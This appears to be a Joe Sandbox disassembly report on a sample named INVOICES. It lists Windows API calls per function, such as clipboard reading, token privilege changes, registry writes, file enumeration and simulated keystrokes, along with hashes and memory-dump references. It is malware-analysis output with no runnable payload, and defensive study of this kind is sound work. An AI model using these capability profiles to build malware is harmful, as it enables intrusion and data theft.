                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction ID: 5a8ce00fa3667c7db8969f946e979da98e5d412a82e41477fbd50009909e9e90
                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction Fuzzy Hash: ECE0E67494010EDFDB00EFB4D54969E7FB4FF04301F100161FD01D2280D6709D508A72
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 007BCBA1
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007BCBFF
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BCC40
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007BCC6A
                                                                                                                                  • SendMessageW.USER32 ref: 007BCC93
                                                                                                                                  • _wcsncpy.LIBCMT ref: 007BCCFF
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 007BCD20
                                                                                                                                  • GetKeyState.USER32(00000009), ref: 007BCD2D
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007BCD43
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 007BCD4D
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007BCD76
                                                                                                                                  • SendMessageW.USER32 ref: 007BCD9D
                                                                                                                                  • SendMessageW.USER32(?,00001030,?,007BB37C), ref: 007BCEA1
                                                                                                                                  • SetCapture.USER32(?), ref: 007BCED3
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BCF38
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007BCF5F
                                                                                                                                  • ReleaseCapture.USER32 ref: 007BCF6A
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007BCFA4
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 007BCFB1
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 007BD00D
                                                                                                                                  • SendMessageW.USER32 ref: 007BD03B
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 007BD078
                                                                                                                                  • SendMessageW.USER32 ref: 007BD0A7
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007BD0C8
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007BD0D7
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007BD0F7
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 007BD104
                                                                                                                                  • GetParent.USER32(?), ref: 007BD124
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 007BD18D
                                                                                                                                  • SendMessageW.USER32 ref: 007BD1BE
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BD21C
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007BD24C
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 007BD276
                                                                                                                                  • SendMessageW.USER32 ref: 007BD299
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BD2EB
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007BD31F
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BD3BB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                  • API String ID: 302779176-4164748364
                                                                                                                                  • Opcode ID: 6c841bc89b2f390acdec27ac91fcf0ec08de435b1364e723267ca9fa5b55c010
                                                                                                                                  • Instruction ID: d2790813d9263a3e0c49f65319853b65be8830ff2f37736d9125b5cc2b9a41a1
                                                                                                                                  • Opcode Fuzzy Hash: 6c841bc89b2f390acdec27ac91fcf0ec08de435b1364e723267ca9fa5b55c010
                                                                                                                                  • Instruction Fuzzy Hash: EE42CC70204341EFD721CF28C848FAABBE5FF49710F148A69F695972A1D77AD850CB62
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$_memset
                                                                                                                                  • String ID: ]~$DEFINE$Oat$P\~$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                                  • API String ID: 1357608183-2460949281
                                                                                                                                  • Opcode ID: 81722b7def7560632107c7b276b241324b6384d715b713093eca28e1a4cea6a5
                                                                                                                                  • Instruction ID: 39058237f7ab98163402d526b82936511ecbccb9daada05c4790a1aa77f16abb
                                                                                                                                  • Opcode Fuzzy Hash: 81722b7def7560632107c7b276b241324b6384d715b713093eca28e1a4cea6a5
                                                                                                                                  • Instruction Fuzzy Hash: 9893B471E40219DFDB24DF98C881BADB7B1FF48710F25816AE945EB281E7789D82CB50
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00734A3D
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076D9BE
                                                                                                                                  • IsIconic.USER32(?), ref: 0076D9C7
                                                                                                                                  • ShowWindow.USER32(?,00000009), ref: 0076D9D4
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0076D9DE
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0076D9F4
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0076D9FB
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0076DA07
                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0076DA18
                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0076DA20
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 0076DA28
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0076DA2B
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA40
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA4B
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA55
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA5A
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA63
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA68
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076DA72
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0076DA77
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0076DA7A
                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 0076DAA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                  • Opcode ID: 1692aff3687a760078ace5f23c8400bb365b66c6037cc293206da4917dad4710
                                                                                                                                  • Instruction ID: a9c38b13ca409a6ffb80963d8569c1a82cea869e19b284ec5f748c3013d3e1a2
                                                                                                                                  • Opcode Fuzzy Hash: 1692aff3687a760078ace5f23c8400bb365b66c6037cc293206da4917dad4710
                                                                                                                                  • Instruction Fuzzy Hash: 5F317371A50318BAEB305FA59C49FBF7F6CEB44F50F108125FE05EA1D0CAB45D11AAA4
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32(007BF910), ref: 007A40A6
                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 007A40B4
                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 007A40BC
                                                                                                                                  • CloseClipboard.USER32 ref: 007A40C8
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007A40E4
                                                                                                                                  • CloseClipboard.USER32 ref: 007A40EE
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007A4103
                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 007A4110
                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 007A4118
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007A4125
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007A4159
                                                                                                                                  • CloseClipboard.USER32 ref: 007A4269
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                  • Opcode ID: 9597c5e34661e58bc1e8f5949bc074e88eafc47de3bfa0ba31d6414914c9b5b4
                                                                                                                                  • Instruction ID: 8e55f7c5bce0399a3518ab8276328565afaea4160a6c17758f530a4eaffb79db
                                                                                                                                  • Opcode Fuzzy Hash: 9597c5e34661e58bc1e8f5949bc074e88eafc47de3bfa0ba31d6414914c9b5b4
                                                                                                                                  • Instruction Fuzzy Hash: 48518075204305AFE310AF64DC89F6FB7A8AFC5B01F008629F646D21E1DFB9D9058B66
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00788AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
                                                                                                                                    • Part of subcall function 00788AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
                                                                                                                                    • Part of subcall function 00788AA3: GetLastError.KERNEL32 ref: 00788B27
                                                                                                                                  • _memset.LIBCMT ref: 0078867B
                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007886CD
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 007886DE
                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007886F5
                                                                                                                                  • GetProcessWindowStation.USER32 ref: 0078870E
                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00788718
                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00788732
                                                                                                                                    • Part of subcall function 007884F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00788631), ref: 00788508
                                                                                                                                    • Part of subcall function 007884F3: CloseHandle.KERNEL32(?,?,00788631), ref: 0078851A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                  • Opcode ID: 765594ea5f3e91fb783287c33a832abd87f4c76da5571c0cd39f3953bb160665
                                                                                                                                  • Instruction ID: bf1932be0222e423d622ece3026d754b61487571675718f44504ce07e2efa1c5
                                                                                                                                  • Opcode Fuzzy Hash: 765594ea5f3e91fb783287c33a832abd87f4c76da5571c0cd39f3953bb160665
                                                                                                                                  • Instruction Fuzzy Hash: 81819E71850209EFDF51EFA4CC49EEE7BB8EF04304F948169F814A6161DB398E04DB62
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0079C819
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079C86D
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0079C892
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0079C8A9
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0079C8D0
                                                                                                                                  • __swprintf.LIBCMT ref: 0079C91C
                                                                                                                                  • __swprintf.LIBCMT ref: 0079C95F
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                  • __swprintf.LIBCMT ref: 0079C9B3
                                                                                                                                    • Part of subcall function 00753818: __woutput_l.LIBCMT ref: 00753871
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CA01
                                                                                                                                    • Part of subcall function 00753818: __flsbuf.LIBCMT ref: 00753893
                                                                                                                                    • Part of subcall function 00753818: __flsbuf.LIBCMT ref: 007538AB
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CA50
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CA9F
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CAEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                  • API String ID: 3953360268-2428617273
                                                                                                                                  • Opcode ID: d6f16c0eafb04a2b5725d06c645097b578b473143c725fd1c8fde1c034ccb24e
                                                                                                                                  • Instruction ID: 4a31d4542c0b61b452fe429278c00f32ff8b76afcca35b8ada500f6dadbb8978
                                                                                                                                  • Opcode Fuzzy Hash: d6f16c0eafb04a2b5725d06c645097b578b473143c725fd1c8fde1c034ccb24e
                                                                                                                                  • Instruction Fuzzy Hash: 2EA120B1408305EBD714EB54C98ADAFB7ECFF94700F404919F585D6192EA78EA08CB62
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0079F042
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F057
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F06E
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0079F080
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0079F09A
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0079F0B2
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F0BD
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0079F0D9
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F100
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F117
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0079F129
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(007E8920), ref: 0079F147
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0079F151
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F15E
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F170
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                  • Opcode ID: 1d374f21cf9d7641c8a7d5774898b98052fc8bc47dbd633d05de12187e4abd1b
                                                                                                                                  • Instruction ID: ac75fe20784b74eb1e475e6b4b0a9652bcf072022a50dbb65ea136dd7fdd77d0
                                                                                                                                  • Opcode Fuzzy Hash: 1d374f21cf9d7641c8a7d5774898b98052fc8bc47dbd633d05de12187e4abd1b
                                                                                                                                  • Instruction Fuzzy Hash: 1931D57254121DAADF10EBB4EC59FEE77ACAF08360F144275E804E31A1EB7CDA45CA64
                                                                                                                                  APIs
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B09DE
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,007BF910,00000000,?,00000000,?,?), ref: 007B0A4C
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007B0A94
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007B0B1D
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 007B0E3D
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 007B0E4A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                  • Opcode ID: 3f3acebc84d5806224d191d6c039cab03b241edbb10b16b88a1dfd521769c7e6
                                                                                                                                  • Instruction ID: 143fd8dd4a13845ce5eec4145093faf133ab86d5f27284cc26a08b43bb58072b
                                                                                                                                  • Opcode Fuzzy Hash: 3f3acebc84d5806224d191d6c039cab03b241edbb10b16b88a1dfd521769c7e6
                                                                                                                                  • Instruction Fuzzy Hash: F4024975200611DFDB14EF28C855E6AB7E5FF88714F04895CF98A9B2A2DB78ED01CB81
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 007BC691
                                                                                                                                    • Part of subcall function 007BAB69: ClientToScreen.USER32(?,?), ref: 007BAB92
                                                                                                                                    • Part of subcall function 007BAB69: GetWindowRect.USER32(?,?), ref: 007BAC08
                                                                                                                                    • Part of subcall function 007BAB69: PtInRect.USER32(?,?,007BC07E), ref: 007BAC18
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 007BC6FA
                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007BC705
                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007BC728
                                                                                                                                  • _wcscat.LIBCMT ref: 007BC758
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007BC76F
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 007BC788
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 007BC79F
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 007BC7C1
                                                                                                                                  • DragFinish.SHELL32(?), ref: 007BC7C8
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007BC8BB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                                  • Opcode ID: db08dde8e09c237045c7205952c10f6f6f45c9ec4113198d27010f01fd9fbe7e
                                                                                                                                  • Instruction ID: 89aa589ec132ea99b7f7cfe77fd80e77096f3832539df4fd73b8566da70401c5
                                                                                                                                  • Opcode Fuzzy Hash: db08dde8e09c237045c7205952c10f6f6f45c9ec4113198d27010f01fd9fbe7e
                                                                                                                                  • Instruction Fuzzy Hash: B4615F71108301EFD701EF64DC89E9BBBE9EF88710F004A2EF691961A1DB789949CB52
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0079F19F
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F1B4
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F1CB
                                                                                                                                    • Part of subcall function 007943C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007943E1
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0079F1FA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F205
